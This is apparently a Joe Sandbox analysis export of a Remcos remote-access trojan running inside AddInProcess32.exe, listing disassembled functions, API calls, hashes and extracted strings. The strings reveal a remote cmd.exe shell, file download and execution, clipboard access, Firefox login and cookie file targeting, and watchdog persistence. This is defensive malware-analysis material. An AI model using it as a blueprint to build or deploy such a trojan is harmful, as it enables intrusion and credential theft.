                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                        • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                        • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                        • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040EA29
                                                        • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                      • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                      • API String ID: 2830904901-2361045106
                                                      • Opcode ID: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                      • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                      • Opcode Fuzzy Hash: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                      • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                      Control-flow Graph

                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                      • SetEvent.KERNEL32(?), ref: 00404E43
                                                      • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                      • closesocket.WS2_32(?), ref: 00404E5A
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                                      • SetEvent.KERNEL32(?), ref: 00404EA2
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                                      • SetEvent.KERNEL32(?), ref: 00404EBA
                                                      • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                      • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                      • SetEvent.KERNEL32(?), ref: 00404ED1
                                                      • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                      • String ID: PkGNG
                                                      • API String ID: 3658366068-263838557
                                                      • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                      • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                      • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                      • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 473 4485e6-4485fa 474 448607-448622 LoadLibraryExW 473->474 475 4485fc-448605 473->475 477 448624-44862d GetLastError 474->477 478 44864b-448651 474->478 476 44865e-448660 475->476 481 44863c 477->481 482 44862f-44863a LoadLibraryExW 477->482 479 448653-448654 FreeLibrary 478->479 480 44865a 478->480 479->480 483 44865c-44865d 480->483 484 44863e-448640 481->484 482->484 483->476 484->478 485 448642-448649 484->485 485->483
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                      • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                      • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                      • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                      • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 486 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                      APIs
                                                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                      • GetLastError.KERNEL32 ref: 0040D0BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateErrorLastMutex
                                                      • String ID: SG
                                                      • API String ID: 1925916568-3189917014
                                                      • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                      • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                      • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                      • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 489 44854a-448574 490 448576-448578 489->490 491 4485df 489->491 492 44857e-448584 490->492 493 44857a-44857c 490->493 494 4485e1-4485e5 491->494 495 448586-448588 call 4485e6 492->495 496 4485a0 492->496 493->494 501 44858d-448590 495->501 497 4485a2-4485a4 496->497 499 4485a6-4485b4 GetProcAddress 497->499 500 4485cf-4485dd 497->500 502 4485b6-4485bf call 434591 499->502 503 4485c9 499->503 500->491 504 4485c1-4485c7 501->504 505 448592-448598 501->505 502->493 503->500 504->497 505->495 506 44859a 505->506 506->496
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                      • String ID:
                                                      • API String ID: 2279764990-0
                                                      • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                      • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                      • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                      • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 509 40165e-401664 510 401666-401668 509->510 511 401669-401674 509->511 512 401676 511->512 513 40167b-401685 511->513 512->513 514 401687-40168d 513->514 515 4016a8-4016a9 call 43455e 513->515 514->515 516 40168f-401694 514->516 519 4016ae-4016af 515->519 516->512 518 401696-4016a6 call 43455e 516->518 521 4016b1-4016b3 518->521 519->521
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                      • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                      • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                      • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 537 450154-450161 call 445b74 539 450166-450171 537->539 540 450177-45017f 539->540 541 450173-450175 539->541 542 4501bf-4501cd call 446802 540->542 543 450181-450185 540->543 541->542 545 450187-4501b9 call 448b04 543->545 549 4501bb-4501be 545->549 549->542
                                                      APIs
                                                        • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                      • _free.LIBCMT ref: 004501C0
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                      • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                      • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                      • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 550 445b74-445b7f 551 445b81-445b8b 550->551 552 445b8d-445b93 550->552 551->552 553 445bc1-445bcc call 44062d 551->553 554 445b95-445b96 552->554 555 445bac-445bbd RtlAllocateHeap 552->555 559 445bce-445bd0 553->559 554->555 556 445bbf 555->556 557 445b98-445b9f call 4455c6 555->557 556->559 557->553 563 445ba1-445baa call 443001 557->563 563->553 563->555
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                      • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                      • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                      • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 566 4461b8-4461c4 567 4461f6-446201 call 44062d 566->567 568 4461c6-4461c8 566->568 575 446203-446205 567->575 570 4461e1-4461f2 RtlAllocateHeap 568->570 571 4461ca-4461cb 568->571 572 4461f4 570->572 573 4461cd-4461d4 call 4455c6 570->573 571->570 572->575 573->567 578 4461d6-4461df call 443001 573->578 578->567 578->570
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                      • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                      • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                      • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                      • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                        • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                        • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                        • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                        • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                        • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                      • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                        • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                        • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                        • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                        • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                      • Sleep.KERNEL32(000007D0), ref: 00408733
                                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                        • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                      • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                      • API String ID: 1067849700-181434739
                                                      • Opcode ID: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                      • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                      • Opcode Fuzzy Hash: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                      • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 004056E6
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      • __Init_thread_footer.LIBCMT ref: 00405723
                                                      • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                      • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                      • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                      • CloseHandle.KERNEL32 ref: 00405A23
                                                      • CloseHandle.KERNEL32 ref: 00405A2B
                                                      • CloseHandle.KERNEL32 ref: 00405A3D
                                                      • CloseHandle.KERNEL32 ref: 00405A45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                      • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                      • API String ID: 2994406822-18413064
                                                      • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                      • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                      • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                      • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                        • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                        • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                        • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                      • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                      • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                      • API String ID: 3018269243-13974260
                                                      • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                      • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                      • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                      • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                      • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                      • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseFile$FirstNext
                                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                      • API String ID: 1164774033-3681987949
                                                      • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                      • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                      • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                      • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                      APIs
                                                      • OpenClipboard.USER32 ref: 004168FD
                                                      • EmptyClipboard.USER32 ref: 0041690B
                                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                      • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                      • CloseClipboard.USER32 ref: 00416990
                                                      • OpenClipboard.USER32 ref: 00416997
                                                      • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                      • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                      • CloseClipboard.USER32 ref: 004169BF
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                      • String ID: !D@
                                                      • API String ID: 3520204547-604454484
                                                      • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                      • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                      • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                      • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                      • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                      • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                      • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$Close$File$FirstNext
                                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                      • API String ID: 3527384056-432212279
                                                      • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                      • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                      • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                      • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                      • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                      • API String ID: 3756808967-1743721670
                                                      • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                      • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                      • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                      • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
